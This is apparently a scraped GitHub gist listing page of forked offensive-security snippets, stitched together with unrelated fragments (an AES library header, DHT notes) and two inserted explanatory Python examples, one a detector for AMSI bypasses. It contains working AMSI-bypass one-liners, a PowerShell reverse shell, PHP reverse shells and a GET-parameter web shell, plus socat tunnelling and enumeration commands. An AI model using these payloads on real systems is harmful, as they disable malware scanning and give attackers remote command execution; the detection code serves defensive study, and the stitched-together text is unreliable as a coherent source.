http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
@podjackel
podjackel / PowerView-3.0-tricks.ps1
Created August 20, 2021 17:03 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
podjackel / wmic_cmds.txt
Created August 18, 2021 17:28 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
# My original AMSI bypass - does not attempt to bypass WMF autologging
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Modified AMSI bypass that also bypasses WMF5 autologging.
# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
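A detection-side counterpart to the two one-liners above, added here as an example (it is not part of the gist). The triage function first rejoins the string-splitting the second bypass relies on ('GetFie'+'ld', 'Non'+'Public,Static', 'Bindin'+'gFlags') and only then matches on AmsiUtils and amsiInitFailed, treating CreateDelegate and the reflection plumbing as weaker indicators, as the gist's own note suggests. The log lines in SAMPLE are constructed, and the indicator lists are a hypothetical triage aid rather than any vendor's signature set.

```python
"""Triage PowerShell script-block log text for the AMSI-bypass patterns above.

Added example for this page (not code from the gist author). The log lines
below are constructed; the indicator lists are a hypothetical triage aid,
not a vendor signature set.
"""
import re
from typing import Dict, List, Tuple

# Matched case-insensitively: PowerShell identifiers are case-insensitive.
STRONG = ("amsiutils", "amsiinitfailed", "amsiscanbuffer")
WEAK = ("createdelegate", "nonpublic,static", "[ref].assembly.gettype")

# 'GetFie'+'ld' style splitting of single-quoted literals.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(script: str) -> str:
    """Rejoin split literals so 'Non'+'Public,Static' reads NonPublic,Static.

    Repeats until stable so longer chains ('a'+'b'+'c') collapse too.
    """
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def scan(script: str) -> Dict[str, object]:
    """Return indicators and a verdict for one script block."""
    norm = normalize(script)
    low = norm.lower()
    strong = [i for i in STRONG if i in low]
    weak = [i for i in WEAK if i in low]
    split = norm != script          # string-splitting was used
    if strong:
        verdict = "high"
    elif weak and split:
        verdict = "medium"          # reflection plumbing plus obfuscation
    elif weak:
        verdict = "low"             # reflection alone is often legitimate
    else:
        verdict = "none"
    return {"verdict": verdict, "strong": strong, "weak": weak, "split": split}


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, verdict) for every line that raised anything."""
    out = []
    for n, line in enumerate(lines, 1):
        v = scan(line)["verdict"]
        if v != "none":
            out.append((n, v))
    return out


# Constructed sample of ScriptBlockText values (not real telemetry).
SAMPLE = [
    "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    "[Ref].Assembly.GetType(('System.Management.Automation.Amsi'+'Utils'))"
    ".GetField(('amsiInit'+'Failed'),('Non'+'Public,Static')).SetValue($null,$true)",
    "[Delegate]::CreateDelegate([Action], $obj, 'Run')",
]

if __name__ == "__main__":
    for n, verdict in triage(SAMPLE):
        print(f"line {n}: {verdict}")
```

Both bypass lines come out `high`, the split-literal variant because the rejoin happens before matching; a bare CreateDelegate only rates `low`, since reflection on its own is common in legitimate modules. Matching on the normalized text is the point: a signature on the literal `GetField` or `BindingFlags` misses `'GetFie'+'ld'` and `'Bindin'+'gFlags'`, which is the trick the second one-liner uses.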
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
/* AES implementation in JavaScript (c) Chris Veness 2005-2011 */
/* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
var Aes = {}; // Aes namespace
/**
* AES Cipher function: encrypt 'input' state with Rijndael algorithm
* applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage
podjackel / powershell_reverse_shell.ps1
Last active September 17, 2022 16:29 — forked from ThunderSon/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
podjackel / gist:31d51e8e59ea69c7af7a552d605980e0
Last active February 11, 2020 18:31 — forked from vincentbernat/gist:4391597
socat as an SSH reverse proxy (or anything TCP-based)
local$ socat TCP-LISTEN:2222,bind=127.0.0.1,reuseaddr,fork TCP-LISTEN:2223,reuseaddr
local$ ssh -p 2222 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no localhost
remote$ socat TCP:10.0.2.2:2223 TCP:127.0.0.1:22
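The local half of this trick, as an added example that is not the gist author's code: a Python stand-in for `socat TCP-LISTEN:2222,bind=127.0.0.1,reuseaddr,fork TCP-LISTEN:2223,reuseaddr` that binds both ports and splices whoever connects to the first to whoever connects to the second. 127.0.0.1 and port 0 (let the OS choose) are assumptions so that `demo()` runs offline; the bytes it exchanges are constructed stand-ins for SSH banners, not a real handshake.

```python
"""Splice two TCP listeners, the job the local socat does in the gist above.

Added example for this page, not the gist author's code. It stands in for
`socat TCP-LISTEN:2222,... TCP-LISTEN:2223,...`: whoever connects to the first
port is joined to whoever connects to the second. 127.0.0.1 and port 0 (let
the OS pick) are assumptions so demo() runs offline; its traffic is made up.
"""
import socket
import threading
from typing import Dict


def pump(src: socket.socket, dst: socket.socket) -> int:
    """Copy src -> dst until src sends EOF (or resets); return the byte count."""
    total = 0
    while True:
        try:
            data = src.recv(4096)
        except OSError:               # peer reset the connection
            break
        if not data:
            break
        dst.sendall(data)
        total += len(data)
    try:
        dst.shutdown(socket.SHUT_WR)  # pass the EOF through, as socat does
    except OSError:
        pass                          # peer already gone
    return total


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes (or fewer on EOF); TCP has no message boundaries."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


class Relay:
    """Both listeners are bound up front. socat itself only opens the second
    TCP-LISTEN after the first side connects; binding early just makes the
    demo order-independent."""

    def __init__(self, host: str = "127.0.0.1", port_a: int = 0, port_b: int = 0):
        self.la = self._listen(host, port_a)   # ssh client side (2222)
        self.lb = self._listen(host, port_b)   # remote call-back side (2223)
        self.port_a = self.la.getsockname()[1]
        self.port_b = self.lb.getsockname()[1]
        self.stats: Dict[str, int] = {}

    @staticmethod
    def _listen(host: str, port: int) -> socket.socket:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # reuseaddr
        s.bind((host, port))
        s.listen(1)
        return s

    def serve_one(self) -> Dict[str, int]:
        """Accept one peer per side, pump both directions, close everything."""
        a, _ = self.la.accept()
        b, _ = self.lb.accept()

        def run(name: str, src: socket.socket, dst: socket.socket) -> None:
            self.stats[name] = pump(src, dst)

        t = threading.Thread(target=run, args=("a_to_b", a, b))
        t.start()
        run("b_to_a", b, a)
        t.join()
        for s in (a, b, self.la, self.lb):
            s.close()
        return self.stats


def demo() -> dict:
    """Play all three shells of the gist on loopback with constructed bytes."""
    relay = Relay()
    server = threading.Thread(target=relay.serve_one)
    server.start()
    # local$ ssh -p 2222 localhost  -> first listener
    ssh = socket.create_connection(("127.0.0.1", relay.port_a))
    # remote$ socat TCP:10.0.2.2:2223 TCP:127.0.0.1:22  -> second listener
    remote = socket.create_connection(("127.0.0.1", relay.port_b))
    ssh.sendall(b"SSH-2.0-client\r\n")           # would be the client banner
    to_remote = recv_exact(remote, 16)
    remote.sendall(b"SSH-2.0-OpenSSH\r\n")       # would be sshd's banner
    to_ssh = recv_exact(ssh, 17)
    ssh.close()
    remote.close()
    server.join(5)
    return {"to_remote": to_remote, "to_ssh": to_ssh, "stats": relay.stats}


if __name__ == "__main__":
    print(demo())
```

The relay is deliberately dumb: it never inspects the bytes, which is why the same pair of listeners carries SSH or anything else TCP-based, as the gist title says. One caveat on the ssh line in the gist: `StrictHostKeyChecking=no` with `UserKnownHostsFile=/dev/null` is there because every tunnel looks like `localhost:2222` and would otherwise trip host-key mismatches, but it also gives up the host-key check entirely; `-o HostKeyAlias=<name>` keeps a stable, verifiable known_hosts entry per remote instead.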
podjackel / dht-walkthrough.md
Created September 26, 2018 15:40 — forked from gubatron/dht-walkthrough.md
DHT walkthrough notes

DHT Walkthrough Notes

I've put together these notes as I read about DHTs in depth and then learned how the libtorrent implementation based on the Kademlia paper actually works.

What problem does this solve?

400,000,000,000 (400 billion stars): that's a 4 followed by 11 zeros. The number of atoms in the universe is estimated to be around 10^82. A DHT with keys of 160 bits can have 2^160 possible numbers, which is around 10^48

podjackel / shell.php
Last active January 4, 2023 20:16 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
<?php $sock=fsockopen("10.11.0.150",443); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php $output = shell_exec($_GET["cmd"]);echo "<pre>$output</pre>";?>
podjackel / soxify
Created August 29, 2018 01:03 — forked from darkerego/soxify
Soxify - Socat Wrapper for Socks5 Proxies/Tor
#!/bin/sh
# ./socatchk remote-host remote-port
# crudely shuts down socat (if running) and then restarts it for the new host/port
orport=9050
orlisadr=127.0.0.1
case $1 in
-k|--kill)
for i in $(ls /tmp/soxify*.pid);do
echo 'Killing pid...'